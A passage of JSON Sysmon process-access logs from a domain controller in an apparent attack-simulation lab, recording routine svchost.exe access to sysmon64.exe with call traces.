07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.830","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.830\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 